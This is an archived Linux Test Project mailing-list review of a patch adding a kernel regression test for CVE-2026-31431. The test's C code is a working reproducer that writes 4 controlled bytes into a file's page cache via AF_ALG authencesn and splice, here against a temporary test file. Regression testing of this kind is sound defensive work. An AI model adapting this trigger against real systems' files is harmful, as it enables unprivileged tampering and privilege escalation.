[{"id":3684718,"web_url":"http://patchwork.ozlabs.org/comment/3684718/","msgid":"<605015be-e527-4cd1-b541-7721a3ba4327@suse.cz>","list_archive_url":null,"date":"2026-04-30T14:06:52","subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","submitter":{"id":77472,"url":"http://patchwork.ozlabs.org/api/people/77472/","name":"Martin Doucha","email":"mdoucha@suse.cz"},"content":"Hi,\nlet's add the test to runtest/crypto as well during merge. One minor nit \nbelow, otherwise for both patches:\n\nReviewed-by: Martin Doucha <mdoucha@suse.cz>\n\nOn 4/30/26 15:30, Andrea Cervesato wrote:\n> From: Andrea Cervesato <andrea.cervesato@suse.com>\n> \n> A logic bug in authencesn allows an unprivileged user to corrupt\n> 4 bytes of page cache via AF_ALG + splice. The test writes known\n> data to a file, attempts corruption through the AEAD scratch-write\n> path, and verifies whether the file content was modified.\n> \n> Tested-by: Avinesh Kumar <avinesh.kumar@suse.com>\n> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>\n> ---\n>   runtest/cve                        |   1 +\n>   testcases/kernel/crypto/.gitignore |   1 +\n>   testcases/kernel/crypto/af_alg08.c | 164 +++++++++++++++++++++++++++++++++++++\n>   3 files changed, 166 insertions(+)\n> \n> diff --git a/runtest/cve b/runtest/cve\n> index c3ecd74dd9f837924b810b7b431ebb911d809966..74300fb546a071ef2d1de3a02549eed35c9a57a4 100644\n> --- a/runtest/cve\n> +++ b/runtest/cve\n> @@ -93,3 +93,4 @@ cve-2022-0185 fsconfig03\n>   cve-2022-4378 cve-2022-4378\n>   cve-2025-38236 cve-2025-38236\n>   cve-2025-21756 cve-2025-21756\n> +cve-2026-31431 af_alg08\n> diff --git a/testcases/kernel/crypto/.gitignore b/testcases/kernel/crypto/.gitignore\n> index 448f986a6acc1341eac052ae9663e8fe28e18d4d..aca016b62110b319eb2825669ce23f5b3608c73e 100644\n> --- a/testcases/kernel/crypto/.gitignore\n> +++ b/testcases/kernel/crypto/.gitignore\n> @@ -5,6 +5,7 @@ af_alg04\n>   af_alg05\n>   af_alg06\n>   af_alg07\n> +af_alg08\n>   pcrypt_aead01\n>   crypto_user01\n>   crypto_user02\n> diff --git a/testcases/kernel/crypto/af_alg08.c b/testcases/kernel/crypto/af_alg08.c\n> new file mode 100644\n> index 0000000000000000000000000000000000000000..06166b6244c1d72e03e3ff8d7e87b1b3b76e93a9\n> --- /dev/null\n> +++ b/testcases/kernel/crypto/af_alg08.c\n> @@ -0,0 +1,164 @@\n> +// SPDX-License-Identifier: GPL-2.0-or-later\n> +/*\n> + * Copyright (C) 2026 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com>\n> + */\n> +\n> +/*\\\n> + * Test for CVE-2026-31431 (\"Copy Fail\") fixed in kernel v7.0:\n> + * a664bf3d603d (\"crypto: algif_aead - Separate src from dst\")\n> + *\n> + * A logic bug in authencesn, the kernel's AEAD wrapper for IPsec Extended\n> + * Sequence Numbers, allows an unprivileged user to write 4 controlled bytes\n> + * into the page cache of any readable file. During AEAD decryption,\n> + * authencesn uses the destination scatterlist as scratch space for ESN byte\n> + * rearrangement. When data is spliced from a file into an AF_ALG socket, the\n> + * 2017 in-place optimization (72548b093ee3) places page cache pages into the\n> + * writable destination scatterlist. authencesn's scratch write then corrupts\n> + * those pages.\n> + *\n> + * The test creates a file with known data, attempts page cache corruption via\n> + * the AF_ALG + splice technique, and verifies whether the file content was\n> + * modified.\n> + *\n> + * Reproducer based on:\n> + * https://github.com/theori-io/copy-fail-CVE-2026-31431\n> + */\n> +\n> +#include \"tst_test.h\"\n> +#include \"tst_af_alg.h\"\n> +#include \"lapi/socket.h\"\n> +#include \"lapi/splice.h\"\n> +\n> +#define TESTFILE \"copy_fail\"\n> +#define OVERWRITE_SIZE 4\n> +#define AEAD_AUTHSIZE 4\n> +#define AEAD_ASSOCLEN 8\n> +#define AES_IV_SIZE 16\n> +#define SPI_SIZE 4\n> +\n> +static const uint8_t original[OVERWRITE_SIZE] = { 'X', 'X', 'X', 'X' };\n> +static const uint8_t payload[OVERWRITE_SIZE] = { 'P', 'W', 'N', 'D' };\n> +\n> +/*\n> + * authenc key format: struct rtattr header (8 bytes) +\n> + * HMAC-SHA256 key (16 bytes) + AES-128 key (16 bytes)\n> + */\n> +static const uint8_t authenc_key[] = {\n> +\t0x08, 0x00, 0x01, 0x00,\n> +\t0x00, 0x00, 0x00, 0x10,\n> +\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n> +\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n> +\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n> +\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n> +};\n> +\n> +static int algfd = -1;\n> +static int reqfd = -1;\n> +static int pipefd[2] = { -1, -1 };\n> +static int file_fd = -1;\n> +\n> +static void try_corrupt(void)\n> +{\n> +\tconst uint8_t iv[AES_IV_SIZE] = { 0 };\n> +\tuint8_t aad[AEAD_ASSOCLEN];\n> +\tchar recvbuf[AEAD_ASSOCLEN];\n> +\tloff_t off_in = 0;\n> +\n> +\talgfd = -1;\n> +\treqfd = -1;\n> +\tpipefd[0] = -1;\n> +\tpipefd[1] = -1;\n> +\n> +\t/* AAD[0..3] = SPI (don't care), AAD[4..7] = ESN scratch-write zone */\n> +\tmemset(aad, 'A', SPI_SIZE);\n> +\tmemcpy(aad + SPI_SIZE, payload, OVERWRITE_SIZE);\n> +\n> +\talgfd = tst_alg_setup(\"aead\", \"authencesn(hmac(sha256),cbc(aes))\",\n> +\t\t\t      authenc_key, sizeof(authenc_key));\n> +\tSAFE_SETSOCKOPT(algfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL,\n> +\t\t\tAEAD_AUTHSIZE);\n> +\n> +\treqfd = tst_alg_accept(algfd);\n> +\n> +\tconst struct tst_alg_sendmsg_params params = {\n> +\t\t.decrypt = true,\n> +\t\t.iv = iv,\n> +\t\t.ivlen = AES_IV_SIZE,\n> +\t\t.assoclen = AEAD_ASSOCLEN,\n> +\t\t.msg_flags = MSG_MORE,\n> +\t};\n> +\n> +\ttst_alg_sendmsg(reqfd, aad, sizeof(aad), &params);\n> +\n> +\tSAFE_PIPE(pipefd);\n> +\n> +\tTEST(splice(file_fd, &off_in, pipefd[1], NULL, OVERWRITE_SIZE, 0));\n> +\tif (TST_RET < 0)\n> +\t\ttst_brk(TBROK | TTERRNO, \"splice(file -> pipe)\");\n> +\n> +\tTEST(splice(pipefd[0], NULL, reqfd, NULL, OVERWRITE_SIZE, 0));\n> +\tif (TST_RET < 0)\n> +\t\ttst_brk(TBROK | TTERRNO, \"splice(pipe -> AF_ALG)\");\n> +\n> +\t/* Expected to fail (invalid ciphertext); triggers the scratch write */\n> +\tTST_EXP_FAIL_SILENT(recv(reqfd, recvbuf, sizeof(recvbuf), 0), EBADMSG);\n> +\n> +\tSAFE_CLOSE(pipefd[0]);\n> +\tSAFE_CLOSE(pipefd[1]);\n> +\tSAFE_CLOSE(reqfd);\n> +\tSAFE_CLOSE(algfd);\n> +}\n> +\n> +static void run(void)\n> +{\n> +\tint fd;\n> +\tuint8_t readback[OVERWRITE_SIZE];\n> +\n> +\tfd = SAFE_OPEN(TESTFILE, O_WRONLY | O_CREAT, 0444);\n> +\tSAFE_WRITE(SAFE_WRITE_ALL, fd, original, OVERWRITE_SIZE);\n> +\tSAFE_CLOSE(fd);\n\nNit: Please use file_fd here.\n\n> +\n> +\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n> +\ttry_corrupt();\n> +\tSAFE_CLOSE(file_fd);\n> +\n> +\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n> +\tSAFE_READ(1, file_fd, readback, sizeof(readback));\n> +\tSAFE_CLOSE(file_fd);\n> +\n> +\tif (memcmp(readback, original, OVERWRITE_SIZE) != 0)\n> +\t\ttst_res(TFAIL, \"Page cache was corrupted via AF_ALG splice\");\n> +\telse\n> +\t\ttst_res(TPASS, \"Page cache was not corrupted\");\n> +\n> +\tSAFE_UNLINK(TESTFILE);\n> +}\n> +\n> +static void cleanup(void)\n> +{\n> +\tif (pipefd[0] != -1)\n> +\t\tSAFE_CLOSE(pipefd[0]);\n> +\n> +\tif (pipefd[1] != -1)\n> +\t\tSAFE_CLOSE(pipefd[1]);\n> +\n> +\tif (reqfd != -1)\n> +\t\tSAFE_CLOSE(reqfd);\n> +\n> +\tif (algfd != -1)\n> +\t\tSAFE_CLOSE(algfd);\n> +\n> +\tif (file_fd != -1)\n> +\t\tSAFE_CLOSE(file_fd);\n> +}\n> +\n> +static struct tst_test test = {\n> +\t.test_all = run,\n> +\t.cleanup = cleanup,\n> +\t.needs_tmpdir = 1,\n> +\t.tags = (const struct tst_tag[]) {\n> +\t\t{\"linux-git\", \"a664bf3d603d\"},\n> +\t\t{\"CVE\", \"2026-31431\"},\n> +\t\t{}\n> +\t},\n> +};\n>","headers":{"Return-Path":"<ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>","X-Original-To":["incoming@patchwork.ozlabs.org","ltp@lists.linux.it"],"Delivered-To":["patchwork-incoming@legolas.ozlabs.org","ltp@picard.linux.it"],"Authentication-Results":["legolas.ozlabs.org;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key;\n unprotected) header.d=suse.cz header.i=@suse.cz header.a=rsa-sha256\n header.s=susede2_rsa header.b=yGIjHSQk;\n\tdkim=fail reason=\"signature verification failed\" header.d=suse.cz\n header.i=@suse.cz header.a=ed25519-sha256 header.s=susede2_ed25519\n header.b=BIpZXST2;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key)\n header.d=suse.cz header.i=@suse.cz header.a=rsa-sha256 header.s=susede2_rsa\n header.b=yGIjHSQk;\n\tdkim=neutral header.d=suse.cz header.i=@suse.cz header.a=ed25519-sha256\n header.s=susede2_ed25519 header.b=BIpZXST2;\n\tdkim-atps=neutral","legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=2001:1418:10:5::2; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)","smtp-out2.suse.de;\n dkim=pass header.d=suse.cz header.s=susede2_rsa header.b=yGIjHSQk;\n dkim=pass header.d=suse.cz header.s=susede2_ed25519 header.b=BIpZXST2"],"Received":["from picard.linux.it (picard.linux.it [IPv6:2001:1418:10:5::2])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519 server-signature ECDSA (secp384r1) server-digest SHA384)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5wwB243cz1xqf\n\tfor <incoming@patchwork.ozlabs.org>; Fri, 01 May 2026 00:07:06 +1000 (AEST)","from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id 1ACC43E5389\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 16:07:03 +0200 (CEST)","from in-7.smtp.seeweb.it (in-7.smtp.seeweb.it [217.194.8.7])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id 7E0723E535D\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 16:06:59 +0200 (CEST)","from smtp-out2.suse.de (smtp-out2.suse.de\n [IPv6:2a07:de40:b251:101:10:150:64:2])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-7.smtp.seeweb.it (Postfix) with ESMTPS id BAD64200DA2\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 16:06:58 +0200 (CEST)","from imap1.dmz-prg2.suse.org (imap1.dmz-prg2.suse.org\n [IPv6:2a07:de40:b281:104:10:150:64:97])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by smtp-out2.suse.de (Postfix) with ESMTPS id 5922A5BD0A;\n Thu, 30 Apr 2026 14:06:57 +0000 (UTC)","from imap1.dmz-prg2.suse.org (localhost [127.0.0.1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by imap1.dmz-prg2.suse.org (Postfix) with ESMTPS id 4E619593B0;\n Thu, 30 Apr 2026 14:06:57 +0000 (UTC)","from dovecot-director2.suse.de ([2a07:de40:b281:106:10:150:64:167])\n by imap1.dmz-prg2.suse.org with ESMTPSA id 33PAEgFi82l0XQAAD6G6ig\n (envelope-from <mdoucha@suse.cz>); Thu, 30 Apr 2026 14:06:57 +0000"],"DKIM-Signature":["v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_rsa;\n t=1777558017; h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references:autocrypt:autocrypt;\n bh=gwG58AjmDVCPs3BJO+8826uxbXHXQs5AwgEf+bXj8X4=;\n b=yGIjHSQkFqHetx+6zdfGM9SqWy4M18BqdRBQV3lc5B2HWm/iBgAYkGGeCjlPSBGEegiGaK\n 22l1eBXcC86jXtS2CVHGe+iMaf6GCwgI8cyuxs4K5IT4xsKM4yas4S/5I5BHiFuTWMT3KR\n yTDZnFL1Sla0DwqWLrKfeirmuXHFYDU=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_ed25519; t=1777558017;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references:autocrypt:autocrypt;\n bh=gwG58AjmDVCPs3BJO+8826uxbXHXQs5AwgEf+bXj8X4=;\n b=BIpZXST2QC4V70InNpD1bu6MY62fNi2pxZgiJGKUrInHHWnguUaNcZ/6Ycsy87M+OyHda0\n 4h8TbNm9CHokHUAA==","v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_rsa;\n t=1777558017; h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references:autocrypt:autocrypt;\n bh=gwG58AjmDVCPs3BJO+8826uxbXHXQs5AwgEf+bXj8X4=;\n b=yGIjHSQkFqHetx+6zdfGM9SqWy4M18BqdRBQV3lc5B2HWm/iBgAYkGGeCjlPSBGEegiGaK\n 22l1eBXcC86jXtS2CVHGe+iMaf6GCwgI8cyuxs4K5IT4xsKM4yas4S/5I5BHiFuTWMT3KR\n yTDZnFL1Sla0DwqWLrKfeirmuXHFYDU=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_ed25519; t=1777558017;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references:autocrypt:autocrypt;\n bh=gwG58AjmDVCPs3BJO+8826uxbXHXQs5AwgEf+bXj8X4=;\n b=BIpZXST2QC4V70InNpD1bu6MY62fNi2pxZgiJGKUrInHHWnguUaNcZ/6Ycsy87M+OyHda0\n 4h8TbNm9CHokHUAA=="],"Message-ID":"<605015be-e527-4cd1-b541-7721a3ba4327@suse.cz>","Date":"Thu, 30 Apr 2026 16:06:52 +0200","MIME-Version":"1.0","User-Agent":"Mozilla Thunderbird","To":"Andrea Cervesato <andrea.cervesato@suse.de>,\n Linux Test Project <ltp@lists.linux.it>","References":"<20260430-cve-2026-31431-v2-0-1136c09ca67b@suse.com>\n <20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>","Content-Language":"en-US","From":"Martin Doucha <mdoucha@suse.cz>","Autocrypt":"addr=mdoucha@suse.cz; keydata=\n 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 ag==","In-Reply-To":"<20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>","X-Rspamd-Action":"no action","X-Rspamd-Server":"rspamd2.dmz-prg2.suse.org","X-Spamd-Result":"default: False [-4.51 / 50.00]; BAYES_HAM(-3.00)[100.00%];\n NEURAL_HAM_LONG(-1.00)[-1.000];\n R_DKIM_ALLOW(-0.20)[suse.cz:s=susede2_rsa,suse.cz:s=susede2_ed25519];\n NEURAL_HAM_SHORT(-0.20)[-1.000]; MIME_GOOD(-0.10)[text/plain];\n MX_GOOD(-0.01)[]; TO_DN_ALL(0.00)[]; MIME_TRACE(0.00)[0:+];\n FUZZY_RATELIMITED(0.00)[rspamd.com];\n DKIM_SIGNED(0.00)[suse.cz:s=susede2_rsa,suse.cz:s=susede2_ed25519];\n RCPT_COUNT_TWO(0.00)[2]; ARC_NA(0.00)[];\n TO_MATCH_ENVRCPT_ALL(0.00)[]; FROM_HAS_DN(0.00)[];\n RCVD_TLS_ALL(0.00)[]; RCVD_COUNT_TWO(0.00)[2];\n FROM_EQ_ENVFROM(0.00)[];\n SPAMHAUS_XBL(0.00)[2a07:de40:b281:104:10:150:64:97:from];\n DNSWL_BLOCKED(0.00)[2a07:de40:b281:106:10:150:64:167:received];\n RCVD_VIA_SMTP_AUTH(0.00)[]; MID_RHS_MATCH_FROM(0.00)[];\n DKIM_TRACE(0.00)[suse.cz:+];\n DBL_BLOCKED_OPENRESOLVER(0.00)[suse.com:email, imap1.dmz-prg2.suse.org:helo,\n imap1.dmz-prg2.suse.org:rdns]","X-Rspamd-Queue-Id":"5922A5BD0A","X-Spam-Score":"-4.51","X-Spam-Level":"","X-Spam-Status":"No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,SPF_HELO_NONE,SPF_PASS shortcircuit=no\n autolearn=disabled version=4.0.1","X-Spam-Checker-Version":"SpamAssassin 4.0.1 (2024-03-25) on in-7.smtp.seeweb.it","X-Virus-Scanned":"clamav-milter 1.0.9 at in-7.smtp.seeweb.it","X-Virus-Status":"Clean","Subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","X-BeenThere":"ltp@lists.linux.it","X-Mailman-Version":"2.1.29","Precedence":"list","List-Id":"Linux Test Project <ltp.lists.linux.it>","List-Unsubscribe":"<https://lists.linux.it/options/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=unsubscribe>","List-Archive":"<http://lists.linux.it/pipermail/ltp/>","List-Post":"<mailto:ltp@lists.linux.it>","List-Help":"<mailto:ltp-request@lists.linux.it?subject=help>","List-Subscribe":"<https://lists.linux.it/listinfo/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=subscribe>","Content-Transfer-Encoding":"7bit","Content-Type":"text/plain; charset=\"us-ascii\"; Format=\"flowed\"","Errors-To":"ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it","Sender":"\"ltp\" <ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>"}},{"id":3684744,"web_url":"http://patchwork.ozlabs.org/comment/3684744/","msgid":"<69f367bc.df0a0220.323089.3259@mx.google.com>","list_archive_url":null,"date":"2026-04-30T14:31:23","subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","submitter":{"id":82886,"url":"http://patchwork.ozlabs.org/api/people/82886/","name":"Andrea Cervesato","email":"andrea.cervesato@suse.com"},"content":"Hi Martin,\n\n> Nit: Please use file_fd here.\n\nUops...im gonna fix it on push. thanks for the review.\n\n--\nAndrea Cervesato\nSUSE QE Automation Engineer Linux\nandrea.cervesato@suse.com","headers":{"Return-Path":"<ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>","X-Original-To":["incoming@patchwork.ozlabs.org","ltp@lists.linux.it"],"Delivered-To":["patchwork-incoming@legolas.ozlabs.org","ltp@picard.linux.it"],"Authentication-Results":["legolas.ozlabs.org;\n\tdkim=pass (1024-bit key;\n unprotected) header.d=lists.linux.it header.i=@lists.linux.it\n header.a=rsa-sha256 header.s=picard header.b=OaMG9zPD;\n\tdkim=fail reason=\"signature verification failed\" (2048-bit key;\n unprotected) header.d=suse.com header.i=@suse.com header.a=rsa-sha256\n header.s=google header.b=PkH5ZlIU;\n\tdkim-atps=neutral","legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=213.254.12.146; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)"],"Received":["from picard.linux.it (picard.linux.it [213.254.12.146])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519 server-signature ECDSA (secp384r1) server-digest SHA384)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5xSP6KtTz1yGq\n\tfor <incoming@patchwork.ozlabs.org>; Fri, 01 May 2026 00:31:32 +1000 (AEST)","from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id 707853E6C86\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 16:31:29 +0200 (CEST)","from in-7.smtp.seeweb.it (in-7.smtp.seeweb.it [217.194.8.7])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id 5F4823E2ACC\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 16:31:26 +0200 (CEST)","from mail-wr1-x430.google.com (mail-wr1-x430.google.com\n [IPv6:2a00:1450:4864:20::430])\n (using TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-7.smtp.seeweb.it (Postfix) with ESMTPS id 9EBD5200DC7\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 16:31:25 +0200 (CEST)","by mail-wr1-x430.google.com with SMTP id\n ffacd0b85a97d-449e96a8a80so259315f8f.3\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 07:31:25 -0700 (PDT)","from p200300ef2f4fc9007395fc0cb1d2b23f.dip0.t-ipconnect.de\n (p200300ef2f4fc9009ff26ae1d4042002.dip0.t-ipconnect.de.\n [2003:ef:2f4f:c900:9ff2:6ae1:d404:2002])\n by smtp.gmail.com with ESMTPSA id\n ffacd0b85a97d-447b3d47ff1sm14344455f8f.6.2026.04.30.07.31.23\n (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);\n Thu, 30 Apr 2026 07:31:24 -0700 (PDT)"],"DKIM-Signature":["v=1; a=rsa-sha256; c=relaxed/simple; d=lists.linux.it;\n i=@lists.linux.it; q=dns/txt; s=picard; t=1777559489; h=message-id :\n to : in-reply-to : date : subject : list-id : list-unsubscribe :\n list-archive : list-post : list-help : list-subscribe : from :\n reply-to : cc : mime-version : content-type :\n content-transfer-encoding : sender : from;\n bh=hgn5T6oNOEMBfvEI21vhSCxnfSaFSu/2du659TzN8LQ=;\n b=OaMG9zPDFvbPDTxDd6QUBQr6iY3K5A9JdJc4iG4z90U7MuR1rBHQ6DBOvJZBLJWB25lC8\n 